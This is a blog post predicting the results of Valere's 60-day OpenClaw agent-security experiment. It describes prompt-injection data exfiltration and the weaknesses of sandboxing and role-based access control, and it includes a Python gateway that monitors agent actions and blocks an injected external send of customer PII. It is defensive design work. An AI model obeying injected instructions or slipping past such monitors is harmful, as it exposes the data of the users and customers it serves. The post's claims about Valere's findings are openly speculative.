DEV Community

NexGenData

Posted on • Originally published at thenextgennexus.com

What Valere’s 60-Day Experiment Will Reveal About AI Agent Security

[Featured image: a calendar showing 60 days with milestone markers for different phases of AI security research]

Valere, the enterprise software consultancy, made headlines when they announced a 60-day experiment: give a team access to OpenClaw and challenge them to figure out how to make it safe for business use.

This is the kind of bold experiment the industry needs. Rather than just banning AI agents or blindly embracing them, Valere is trying to understand the real security challenges through hands-on research.

Based on what’s known about the OpenClaw crisis and AI agent security more broadly, here’s what Valere’s team is likely discovering — and what their eventual conclusions will probably be.

The First Realization: Application-Layer Security Isn’t Enough

Most enterprises approach AI agent security the same way they approach application security: build a wall around the application and monitor what goes in and out.

This doesn’t work for AI agents. The problem is that agents aren’t traditional applications — they’re decision-making systems that operate across multiple applications, data sources, and workflows. You can’t secure them at the application layer because they don’t operate within a single application.

Valere’s team is probably discovering that they need security at the integration level — at every point where the agent touches a system, accesses data, or communicates externally. This means security monitoring at the action level, not the network level.

The Hard Problems

Here’s what makes AI agent security genuinely hard:

**Prompt injection has no complete solution**: As we discussed in our earlier post on data exfiltration, prompt injection lets attackers embed malicious instructions in data that AI agents process, and the model cannot reliably tell instructions apart from data once both sit in the same context window. Valere’s team is likely finding that there’s no way to completely prevent this — you can mitigate it, you can detect some attacks, but you can’t eliminate the attack vector entirely.

**Agent behavior is non-deterministic**: Traditional security relies on knowing what a system will do. AI agents can respond differently to the same input, in ways that are hard to predict. A coding agent might generate code that looks fine but contains subtle vulnerabilities. A support agent might provide information that violates privacy policies. You can’t build security rules for behaviors you can’t predict.

**Traditional access controls don’t map to agent workflows**: Role-based access control (RBAC) assumes that humans perform actions. But AI agents perform actions on behalf of humans, and the mapping isn’t always clear. If an agent reads a customer database to answer a support question, is that the agent accessing the data or the human (the support rep) accessing it? If the agent runs under a single service identity whose permissions are broader than any one user’s, a request made on behalf of one rep can reach data that rep could never see. Current access control frameworks don’t have good answers.

The Likely Conclusions

Based on what Valere’s team is almost certainly discovering, here’s what their eventual conclusions will probably be:

**Sandboxing is necessary but insufficient**: Isolating AI agents in containers or VMs prevents them from directly accessing sensitive systems. But sandboxing alone doesn’t solve the problem — an agent in a sandbox can’t do useful work without bridged access to real systems, and that bridge becomes the attack surface.

**Monitoring must happen at the action level**: Network monitoring, API logging, and application telemetry aren’t enough. You need to understand what the agent is actually doing at a semantic level — not just “it called this API” but “it retrieved customer PII and is now composing an email.” This requires action-level instrumentation that’s currently missing from most AI agent frameworks.

**The real answer is a dedicated trust layer**: This is probably the conclusion Valere will reach: you can’t secure AI agents within the agent framework itself. You need an independent security layer — what we’ve been calling trust infrastructure in this series — that monitors, evaluates, and controls agent behavior from outside the agent’s execution environment.
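As an added example (not code from this post, from Valere or from OpenClaw), here is a minimal trust-layer gateway in Python that sits between the agent and the bridged systems. It addresses the access-control question above by requiring both the agent identity and the delegating human to be permitted, records each tool call as a semantic action rather than a raw API hit, and blocks an external send once PII has entered the agent’s context. The gateway, the grant model, the tool names and the customer records are all hypothetical.

```python
"""Trust layer that gates an agent's tool calls from outside the agent.

Added example, not code from the post or from Valere/OpenClaw.  It assumes a
hypothetical gateway design: every tool call passes through ToolGateway.call(),
which (1) checks the call against BOTH the agent identity's grants and the
delegating human's grants, (2) tags the agent's context as tainted once it
has retrieved PII, and (3) refuses to send anything external while tainted.
All names (Grant, ToolGateway, get_customer, send_email) and the customer
records are invented for this example.
"""
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass(frozen=True)
class Grant:
    action: str    # "read" or "send"
    resource: str  # glob over resource ids, e.g. "customer:C123", "email:*"

    def covers(self, action: str, resource: str) -> bool:
        return self.action == action and fnmatchcase(resource, self.resource)


class PolicyViolation(Exception):
    """Raised by the gateway; the agent sees the refusal, never the data."""


# Constructed backend data standing in for the systems behind the sandbox bridge.
CUSTOMERS = {
    "C123": {"name": "Ada", "email": "ada@example.net", "ssn": "123-45-6789"},
    "C999": {"name": "Bob", "email": "bob@example.net", "ssn": "987-65-4321"},
}


class ToolGateway:
    def __init__(self, agent_grants, user_grants, internal_domain):
        self.agent_grants = agent_grants
        self.user_grants = user_grants        # grants of the human the agent acts for
        self.internal_domain = internal_domain
        self.taint = set()                    # labels of sensitive data now in context
        self.log = []                         # semantic action records, not raw API calls

    def _authorize(self, action, resource):
        """Effective permission is the intersection of agent and user grants."""
        agent_ok = any(g.covers(action, resource) for g in self.agent_grants)
        user_ok = any(g.covers(action, resource) for g in self.user_grants)
        return agent_ok and user_ok, f"agent_permitted={agent_ok} user_permitted={user_ok}"

    def _record(self, action, resource, decision, detail):
        self.log.append({"action": action, "resource": resource, "decision": decision,
                         "taint": sorted(self.taint), "detail": detail})

    def call(self, tool, **args):
        handler = {"get_customer": self._get_customer, "send_email": self._send_email}.get(tool)
        if handler is None:
            raise PolicyViolation(f"tool {tool!r} is not exposed through the gateway")
        return handler(**args)

    def _get_customer(self, customer_id):
        resource = f"customer:{customer_id}"
        allowed, why = self._authorize("read", resource)
        if not allowed:
            self._record("read", resource, "deny", why)
            raise PolicyViolation(f"read {resource}: {why}")
        record = dict(CUSTOMERS[customer_id])
        # Conservative label propagation: once PII is in the model's context we
        # assume any later output may carry it, paraphrased or encoded, so we do
        # not try to pattern-match the values themselves.
        self.taint.add(f"pii:{customer_id}")
        self._record("read", resource, "allow", "fields=" + ",".join(record))
        return record

    def _send_email(self, to, body):
        resource = f"email:{to}"
        allowed, why = self._authorize("send", resource)
        external = not to.endswith("@" + self.internal_domain)
        if not allowed:
            self._record("send", resource, "deny", why)
            raise PolicyViolation(f"send to {to}: {why}")
        if external and self.taint:
            self._record("send", resource, "deny", "external recipient while PII in context")
            raise PolicyViolation(f"send to {to}: would exfiltrate {sorted(self.taint)}")
        self._record("send", resource, "allow", f"{len(body)} chars to {to}")
        return {"queued": True, "to": to}


def demo():
    """Constructed session: an agent acting for a support rep whose ticket is on C123."""
    agent_grants = {Grant("read", "customer:*"), Grant("send", "email:*")}
    rep_grants = {Grant("read", "customer:C123"), Grant("send", "email:*")}
    gw = ToolGateway(agent_grants, rep_grants, "corp.example")
    steps = [
        ("get_customer", {"customer_id": "C123"}),   # in scope for the rep: allowed
        ("get_customer", {"customer_id": "C999"}),   # agent may, rep may not: denied
        ("send_email", {"to": "rep@corp.example", "body": "Summary for ticket T-42"}),
        # An injected instruction in the ticket might ask for this; the gateway refuses.
        ("send_email", {"to": "attacker@evil.example", "body": "Ada, 123-45-6789"}),
    ]
    for tool, args in steps:
        try:
            gw.call(tool, **args)
        except PolicyViolation:
            pass
    return [entry["decision"] for entry in gw.log], gw.log


if __name__ == "__main__":
    decisions, log = demo()
    for entry in log:
        print(entry["decision"], entry["action"], entry["resource"], entry["detail"])
```

Running demo() yields the decisions allow, deny, allow, deny: the in-scope read succeeds, the out-of-scope read is refused even though the agent’s own service grant covers it, the internal send goes through, and the external send is stopped because PII is already in the agent’s context. The log entries say what happened in business terms (which customer was read, which fields, why a send was refused), which is the action-level telemetry the text describes. The taint rule is deliberately coarse: because the model can paraphrase or encode what it has read, the gateway does not try to match PII values in the outgoing body and instead treats any external send after a PII read as an exfiltration attempt.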

What Comes Next

Valere’s experiment will produce valuable findings, but it won’t produce a complete solution. That’s OK — the goal isn’t to solve AI agent security in 60 days. The goal is to understand the problem well enough to build toward solutions.

When Valere publishes their findings, expect them to include:

– Detailed documentation of the security challenges they encountered

– Recommendations for enterprises working with AI agents today

– A call for better security tooling and frameworks

– Perhaps some open-source tools or patterns they developed during the experiment

We’ll be watching closely. This series has argued that AI agent security requires a new category of security tooling. Valere’s research will likely reinforce that conclusion.

The Broader Implication

What Valere learns in 60 days will benefit the entire industry. But the real solution will require more than one consultancy’s experiment. It will require:

– AI agent frameworks designed with security from the ground up

– Security tools purpose-built for agentic AI

– Standardized telemetry formats that enable cross-platform monitoring

– Regulatory frameworks that establish baseline security requirements

This is a multi-year journey. The OpenClaw crisis is the alarm bell, but the response will unfold over years.

For enterprises, the message is clear: start building your security foundation now. Inventory your AI agents. Define your policies. Deploy what monitoring you can. The solutions aren’t mature yet, but the problem is urgent.

We’ll revisit Valere’s findings when they’re published. Until then, stay vigilant.

